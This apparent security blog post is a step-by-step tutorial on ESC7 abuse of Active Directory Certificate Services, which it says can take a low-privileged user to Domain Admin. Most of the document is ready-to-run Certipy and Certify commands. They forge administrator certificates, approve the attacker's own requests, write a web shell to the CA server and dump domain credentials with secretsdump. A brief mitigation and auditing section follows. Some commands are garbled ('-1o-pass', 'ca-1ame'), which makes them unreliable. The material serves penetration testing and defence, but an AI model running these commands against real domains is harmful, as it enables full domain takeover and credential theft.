Listen to this Post

Introduction
Active Directory Certificate Services (AD CS) remains one of the most overlooked attack surfaces in enterprise environments. The ESC7 exploitation technique targets misconfigured access controls on Certificate Authorities (CAs), allowing a low-privileged domain user to escalate directly to Domain Admin—without ever needing administrative credentials. By abusing the `ManageCA` or `ManageCertificates` permissions, an attacker can manipulate CA behavior, approve their own malicious certificate requests, and authenticate as any privileged user via Kerberos PKINIT. This article provides a comprehensive, step-by-step technical deep dive into ESC7 exploitation and mitigation.
Learning Objectives
- Understand the core mechanics of ESC7 and how overly permissive CA ACLs enable privilege escalation.
- Master the Certipy toolkit for enumerating, exploiting, and abusing AD CS misconfigurations.
- Learn practical commands for Linux and Windows environments to detect, exploit, and remediate ESC7 vulnerabilities.
You Should Know
1. Understanding ESC7: The CA Permission Abuse Attack
ESC7 is a privilege escalation vector that exploits insecure Discretionary Access Control Lists (DACLs) on a Certificate Authority. The attack hinges on two critical permissions:
- ManageCA (CA Administrator) : Grants full administrative control over the CA, including the ability to modify CA settings, enable/disable certificate templates, and toggle dangerous flags like `EDITF_ATTRIBUTESUBJECTALTNAME2` (which allows users to specify arbitrary Subject Alternative Names). With this right, an attacker can effectively create the conditions for an ESC6-style attack.
-
ManageCertificates (Certificate Manager/CA Officer) : Allows the principal to approve or deny pending certificate requests. While less dangerous alone, this permission enables an attacker to bypass manual approval workflows and issue certificates they previously requested.
The critical insight: if a regular domain user holds either of these permissions—or can grant themselves these rights—the entire domain is at risk. Microsoft explicitly warns that misconfigured CA ACLs can lead to “complete domain compromise”.
Step-by-Step: Enumerating ESC7 Vulnerabilities
Before exploitation, you must identify whether a CA is misconfigured. Use Certipy’s `find` command:
Linux - Basic enumeration certipy find -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 Linux - Filter for vulnerable configurations only certipy find -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -vulnerable Linux - With explicit target IP certipy find -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -target-ip 192.168.1.11
The output will highlight whether any user has `ManageCA` or `ManageCertificates` rights over a CA. Certipy generates JSON and TXT output files in the current directory for further analysis.
On Windows, you can achieve similar enumeration using Certify:
Windows - Certify enumeration Certify.exe find /vulnerable Certify.exe enum-cas --filter-vulnerable --hide-admins
- Exploitation Path 1: ManageCA → Enable ESC6 → Forge Admin Certificate
If you possess `ManageCA` rights, you can modify the CA configuration to enable the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag—effectively turning the CA into an ESC6-vulnerable state. This allows any user to request a certificate with an arbitrary SAN (e.g., [email protected]).
Step-by-Step: Enable ESC6 and Forge a Certificate
Step 1: Enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (ESC6) certipy ca -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -enable-esc6 Step 2: Request a certificate impersonating the Domain Admin certipy req -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -template 'User' -altname 'administrator' Step 3: Retrieve and authenticate with the forged certificate certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10
After authentication, you will have a valid Kerberos TGT for the Domain Admin account, enabling full domain compromise.
Alternative Exploitation: RCE on the CA Server
With `ManageCA` rights, you can also achieve remote code execution by abusing Certificate Distribution Points (CDPs):
Windows - Write a web shell to the CA server's web directory Certify.exe writefile /ca:SERVER\ca-1ame /path:C:\inetpub\wwwroot\shell.aspx /input:C:\Local\path\shell.aspx Write to a remote writable share Certify.exe writefile /ca:SERVER\ca-1ame /path:\remote.server\share\shell.php /input:C:\Local\path\shell.php
- Exploitation Path 2: ManageCertificates → Approve Pending Requests
The `ManageCertificates` permission allows you to approve pending certificate requests—even those you submitted yourself. The classic ESC7 attack using this path leverages the SubCA certificate template, which is enabled by default and vulnerable to ESC1-style abuse but typically requires administrator approval.
Step-by-Step: SubCA Template Abuse
Step 1: Verify the SubCA template is enabled (or enable it if you have ManageCA) certipy ca -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -enable-template 'SubCA' Step 2: Request a certificate using the SubCA template (this will be denied initially) certipy req -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -template 'SubCA' -upn '[email protected]' The request will fail with an access denied error. Note the request ID from the output. Step 3: As a Certificate Manager, approve and issue the previously denied request certipy ca -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -issue-request <REQUEST_ID> Step 4: Retrieve the issued certificate certipy req -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -retrieve <REQUEST_ID> Step 5: Authenticate using the certificate certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10
If you only have `ManageCA` but not ManageCertificates, you can grant yourself the `ManageCertificates` permission first:
Add yourself as a CA Officer certipy ca -ca 'DOMAIN-CA' -u [email protected] -p 'Password123' -dc-ip 192.168.1.10 -add-officer user
4. Kerberos PKINIT Authentication: The Final Step
Once you have a valid certificate impersonating a privileged user, you can authenticate to the domain using PKINIT—an extension of the Kerberos protocol that enables certificate-based authentication. Certipy’s `auth` command handles this automatically, requesting a TGT and placing it in a ccache file for further use.
Authenticate and obtain a TGT certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10 Use the TGT with other tools (e.g., secretsdump) export KRB5CCNAME=/path/to/administrator.ccache secretsdump.py -k -1o-pass [email protected] -dc-ip 192.168.1.10
5. Mitigation and Detection Strategies
Defending against ESC7 requires a multi-layered approach:
Audit CA Permissions Regularly
Identify and remove any `ManageCA` or `ManageCertificates` permissions granted to non-privileged users or groups. Microsoft Defender for Identity provides a security assessment specifically for misconfigured CA ACLs (ESC7).
Review Certificate Templates
Ensure that sensitive templates like `SubCA` are either disabled or restricted to highly privileged accounts only. Disable the `ENROLLEE_SUPPLIES_SUBJECT` flag on templates that permit client authentication.
Enable Comprehensive Auditing
Monitor for:
- CA configuration changes (especially enabling
EDITF_ATTRIBUTESUBJECTALTNAME2) - Pending request approvals by non-administrators
- Certificate issuance for privileged accounts
- PKINIT authentication events from unexpected sources
Windows Commands for Auditing
Check CA permissions using built-in tools Get-ADPermission -Identity "CN=YourCA,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" Review certificate templates Get-ADObject -Filter 'ObjectClass -eq "pKICertificateTemplate"' -Properties
Certipy for Defensive Assessment
Non-vulnerable enumeration for blue teams certipy find -u [email protected] -p 'SecurePass' -dc-ip 192.168.1.10 -vulnerable
What Undercode Say
- Key Takeaway 1: ESC7 is not a software vulnerability—it is a configuration failure. Overly permissive CA ACLs turn a legitimate administrative function into a privilege escalation highway. The attack does not require malware or exploits; it simply uses the CA as designed.
-
Key Takeaway 2: The combination of `ManageCA` and `ManageCertificates` is devastating. With
ManageCA, you can create the vulnerability (enable ESC6); withManageCertificates, you can bypass approval workflows. Together, they provide complete control over the certificate infrastructure.
Analysis: ESC7 represents a fundamental trust problem in AD CS. The certificate authority is the root of trust for the entire domain—if an attacker can manipulate it, they can become anyone. What makes ESC7 particularly insidious is that it often goes unnoticed: the attacker uses legitimate CA functionality, generates no malware, and leaves minimal forensic artifacts. Organizations must treat CA permissions with the same rigor as Domain Admin privileges. Regular audits, principle of least privilege, and continuous monitoring of CA events are non-1egotiable. The rise of tooling like Certipy has dramatically lowered the barrier to entry for these attacks, making automated detection and response essential for modern security operations.
Prediction
- +1 The growing awareness of AD CS attack vectors will drive increased investment in PKI security tooling, with Microsoft and third-party vendors developing more sophisticated detection and automated remediation capabilities for ESC-style attacks.
-
-1 As defensive tooling improves, attackers will shift focus to more obscure ESC techniques (ESC8, ESC11, ESC13, ESC16) and novel abuse paths that bypass current detection logic.
-
-1 The complexity of AD CS configuration will continue to result in widespread misconfigurations, ensuring that ESC7 and similar attacks remain viable for years to come—particularly in large enterprises with legacy PKI deployments.
-
+1 Security frameworks and compliance standards (e.g., CIS benchmarks, Microsoft Secure Score) will increasingly mandate strict CA ACL reviews, pushing organizations toward better PKI hygiene.
-
-1 The availability of automated exploitation tools like Certipy and ADCSKiller means that even moderately skilled adversaries can execute ESC7, expanding the threat surface beyond advanced persistent threats.
References
- SpecterOps. Certified Pre-Owned white paper
- Certipy GitHub repository
- Microsoft Defender for Identity: Misconfigured CA ACL assessment
- InternalAllTheThings: AD CS ESC7
▶️ Related Video (80% Match):
https://www.youtube.com/watch?v=3C9_yauKycM
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Joas Antonio – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


